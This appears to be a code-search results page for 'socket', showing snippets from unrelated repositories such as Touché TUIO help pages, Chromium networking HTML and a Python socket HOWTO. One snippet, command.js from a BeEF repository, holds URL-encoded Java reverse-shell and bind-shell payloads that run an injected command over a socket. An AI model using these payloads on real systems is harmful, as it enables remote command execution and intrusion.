PageRenderTime 320ms queryTime 30ms sortTime 0ms getByIdsTime 253ms findMatchingLines 10ms

16+ results for 'socket%20repo:intelij/ChattAR-ios' (320 ms)

Not the results you expected?
helpindex.html http://touche.googlecode.com/svn/trunk/ | HTML | 119 lines
                    
29<p class="p2"><span class="Apple-tab-span">	</span><a href="adding%20a%20tuio%20client.html">Adding a TUIO client</a></p>
                    
30<p class="p2"><span class="Apple-tab-span">	</span><a href="tuio_flash%20xml-socket%20clients.html">AS3 (Flash)</a></p>
                    
31<p class="p1"><b>B</b></p>
                    
57<p class="p2"><span class="Apple-tab-span">	</span><a href="libdc1394%20input%20settings.html">FireWire cameras</a></p>
                    
58<p class="p2"><span class="Apple-tab-span">	</span><a href="tuio_flash%20xml-socket%20clients.html">Flash</a></p>
                    
59<p class="p2"><span class="Apple-tab-span">	</span><a href="tuio_flash%20xml-socket%20settings.html">Flash Global Security Options</a></p>
                    
101<p class="p2"><span class="Apple-tab-span">	</span><a href="tuio.html">TUIO</a></p>
                    
102<p class="p2"><span class="Apple-tab-span">	</span><a href="tuio_flash%20xml-socket%20clients.html">TUIO (Flash/XML-Socket)</a></p>
                    
103<p class="p2"><span class="Apple-tab-span">	</span><a href="adding%20a%20tuio%20client.html">TUIO, Adding clients</a></p>
                    
                
adding a tuio client.html http://touche.googlecode.com/svn/trunk/ | HTML | 54 lines
                    
44<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio.html">TUIO</a></li>
                    
45<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio_flash%20xml-socket%20clients.html">TUIO/Flash XML-Socket Clients</a></li>
                    
46<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio%20settings.html">TUIO settings</a></li>
                    
                
index.html https://github.com/Gitman1989/chromium.git | HTML | 368 lines
                    
138      <h4>Socket pools</h4>
                    
139      <a href='#events&q=type:SOCKET%20is:active'>View live sockets</a>
                    
140      <p>
                    
                
command.js https://github.com/asaafan/BeEF.git | JavaScript | 67 lines
                    
34   reverse = "try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
                    
35   bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
                    
36
                    
                
sockets_view.html https://gitlab.com/0072016/Facebook-SDK- | HTML | 28 lines
                    
16    </li>
                    
17    <li><a href='#events&q=type:SOCKET%20is:active'>View live sockets</a>
                    
18    </li>
                    
                
index.cfm https://github.com/andreacfm/websockets_example_apps.git | ColdFusion | 44 lines
                    
35        </p>
                    
36        <script src="https://gist.github.com/810140.js?file=websocket%20base"></script>
                    
37
                    
                
tuio_flash xml-socket settings.html http://touche.googlecode.com/svn/trunk/ | HTML | 60 lines
                    
31<p class="p1">Touché supports output of <a href="tuio.html">TUIO</a> data via Flash/XML-Sockets, as is being used by the AS3 demo applications in the <a href="http://code.google.com/p/touchlib/">touchlib</a> package. There are some settings available that pertain to TUIO/Flash XML-Socket output, which can be accessed by clicking "TUIO/Flash XML Settings..." in the "Setup" menu.</p>
                    
32<p class="p2"><img src="tuio_flash%20xml-socket%20settings.tuio_flash_xml_settings.jpg" alt="tuio_flash_xml_settings.jpg"></p>
                    
33<p class="p1">The following settings are available:</p>
                    
51<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio.html">TUIO</a></li>
                    
52<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio_flash%20xml-socket%20clients.html">TUIO/Flash XML-Socket Clients</a></li>
                    
53</ul>
                    
                
configuring touche?.html http://touche.googlecode.com/svn/trunk/ | HTML | 48 lines
                    
38<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio%20settings.html">TUIO Settings</a></li>
                    
39<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio_flash%20xml-socket%20settings.html">TUIO/Flash XML-Socket Settings</a></li>
                    
40<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tracking%20pipeline%20configuration.html">Tracking pipeline configuration</a></li>
                    
                
tuio.html http://touche.googlecode.com/svn/trunk/ | HTML | 48 lines
                    
32<p class="p1">The <a href="http://reactable.iua.upf.edu/?tuio">protocol specification</a> as well as some <a href="http://reactable.iua.upf.edu/?software">sample applications</a> and libraries are available on the <a href="http://reactable.iua.upf.edu/">reactable</a> homepage.</p>
                    
33<p class="p1">When using Flash applications, TUIO is sometimes being transported over a Flash XML-Socket. While <a href="http://www.benchun.net/flosc/">flosc</a> is often used to translate TUIO/OSC to TUIO/Flash XML-Socket, Touché can output XML-Socket-backed TUIO directly (see "<a href="tuio_flash%20xml-socket%20clients.html">TUIO/Flash XML-Socket clients</a>"), allowing you to use Flash applications without needing to run flosc.</p>
                    
34<p class="p2"><br></p>
                    
37<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="adding%20a%20tuio%20client.html">Adding a TUIO client</a></li>
                    
38<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio_flash%20xml-socket%20clients.html">TUIO/Flash XML-Socket Clients</a></li>
                    
39<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio_flash%20xml-socket%20settings.html">TUIO/Flash XML-Socket Settings</a></li>
                    
                
tuio_flash xml-socket clients.html http://touche.googlecode.com/svn/trunk/ | HTML | 52 lines
                    
33<p class="p1">However, Touché can natively output tracking data in the same format that flosc translates TUIO data into, allowing you to use Flash clients without needing to use flosc.</p>
                    
34<p class="p1">When starting a Flash application, it can connect to the XML-Socket server provided by Touché, which will then deliver tracking data to the application. Per default, the XML-Socket server listens on port 3000, but this can be changed in the <a href="tuio_flash%20xml-socket%20settings.html">TUIO/Flash XML-Socket settings</a>.</p>
                    
35<p class="p1">XML-Socket clients show up in the <a href="tracking%20client%20list.html">tracking client list</a> just like proper Touché framework clients do.</p>
                    
37<p class="p3"><b>IMPORTANT NOTICE</b></p>
                    
38<p class="p1">It is crucial that the folder(s) containing your Flash multitouch applications is marked as trusted in Flash's Global Security Options, so that they can connect to Touché. For more information on this, see "<a href="tuio_flash%20xml-socket%20settings.html">TUIO/Flash XML-Socket settings</a>".</p>
                    
39<p class="p4"><br></p>
                    
43<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio.html">TUIO</a></li>
                    
44<li style="margin: 0.0px 0.0px 9.0px 0.0px; line-height: 16.0px; font: 12.0px Lucida Grande"><a href="tuio_flash%20xml-socket%20settings.html">TUIO/Flash XML-Socket Settings</a></li>
                    
45</ul>
                    
                
introduction.html http://touche.googlecode.com/svn/trunk/ | HTML | 40 lines
                    
30<p class="p1">Touché also supports the <a href="tuio.html">TUIO protocol</a>, which you can also use as a means to relay tracking data to your own application. TUIO libraries are available for a large range of environments and languages, such as C++, Processing and Quartz Composer.</p>
                    
31<p class="p1">Additionally to TUIO/OSC, Touché can also output tracking data via <a href="tuio_flash%20xml-socket%20clients.html">TUIO/Flash XML-Socket</a>, which is convenient if you are using Flash/AS3 to develop multitouch applications.</p>
                    
32<p class="p1">Touché is free open-source software.</p>
                    
                
OkCoinStreamingMarketDataService.java git://github.com/timmolter/XChange.git | Java | 204 lines
                    
26 * #### spot ####
                    
27 * https://github.com/okcoin-okex/API-docs-OKEx.com/blob/master/API-For-Spot-CN/%E5%B8%81%E5%B8%81%E4%BA%A4%E6%98%93WebSocket%20API.md
                    
28 * ##### future ####
                    
28 * ##### future ####
                    
29 * https://github.com/okcoin-okex/API-docs-OKEx.com/blob/master/API-For-Futures-CN/%E5%90%88%E7%BA%A6%E4%BA%A4%E6%98%93WebSocket%20API.md
                    
30 * https://github.com/okcoin-okex/API-docs-OKEx.com/blob/master/API-For-Futures-EN/WebSocket%20API%20for%20FUTURES.md
                    
                
2019-08-19-Packt.md https://github.com/github/dmca.git | Markdown | 118 lines
                    
32https://github.com/shivam-jha/Free-Web-Development-Books/blob/master/book/Functional%20Programming%20in%20JavaScript.pdf   
                    
33https://github.com/shivam-jha/Free-Web-Development-Books/blob/master/book/Getting%20Started%20with%20HTML5%20WebSocket%20Programming.pdf   
                    
34https://github.com/shivam-jha/Free-Web-Development-Books/blob/master/book/Getting%20Started%20with%20Twitter%20Flight.pdf   
                    
68https://github.com/shivam-jha/Free-Web-Development-Books/blob/master/book/WebRTC%20Integrator's%20Guide.pdf   
                    
69https://github.com/shivam-jha/Free-Web-Development-Books/blob/master/book/WebSocket%20Essentials%20%E2%80%93%20Building%20Apps%20with%20HTML5%20WebSockets.pdf   
                    
70https://github.com/shivam-jha/Free-Web-Development-Books/blob/master/book/WordPress%203%20Complete.pdf   
                    
                
sidebar.html https://github.com/zh/ReaTiWe.git | HTML | 18 lines
                    
12<div class="section">
                    
13<iframe style="border: medium none; width: 180px; height: 500px; overflow: hidden;" src="http://widget.collecta.com/widget.html?query=xmpp%20OR%20pubsubhubbub%20OR%20websocket%20OR%20webhooks%20OR%20collecta&alias=Real%20Time%20Web&headerimg=&stylesheet=&delay=" id="widgetframe" frameborder="0" scrolling="no"></iframe>
                    
14</div>
                    
                
Socket Programming HOWTO.html https://bitbucket.org/DavidVilla/python-socket-programming-howto-spanish-translation | HTML | 650 lines
                    
2<html><head>
                    
3<link rel="STYLESHEET" href="Socket%20Programming%20HOWTO_files/sockets.css" type="text/css">
                    
4<link rel="first" href="http://www.amk.ca/python/howto/sockets/sockets.html" title="Socket Programming HOWTO">
                    
19<tbody><tr>
                    
20<td><img src="Socket%20Programming%20HOWTO_files/blank.gif" alt="" border="0" height="32" width="32"></td>
                    
21<td><img src="Socket%20Programming%20HOWTO_files/blank.gif" alt="" border="0" height="32" width="32"></td>
                    
21<td><img src="Socket%20Programming%20HOWTO_files/blank.gif" alt="" border="0" height="32" width="32"></td>
                    
22<td><img src="Socket%20Programming%20HOWTO_files/blank.gif" alt="" border="0" height="32" width="32"></td>
                    
23<td align="center" width="100%">Socket Programming HOWTO</td>
                    
23<td align="center" width="100%">Socket Programming HOWTO</td>
                    
24<td><img src="Socket%20Programming%20HOWTO_files/blank.gif" alt="" border="0" height="32" width="32"></td>
                    
25<td><img src="Socket%20Programming%20HOWTO_files/blank.gif" alt="" border="0" height="32" width="32"></td>
                    
                
index.cfm https://github.com/andreacfm/websockets_example_apps.git | ColdFusion | 63 lines
                    
28        </p>
                    
29        <script src="https://gist.github.com/810191.js?file=websocket%20data_push%20example%20-%20data.cfm"></script>
                    
30        <p>As you see the thread simply create a set of data and push them to the gateway. That's it.</p>
                    
                
 

Source

Language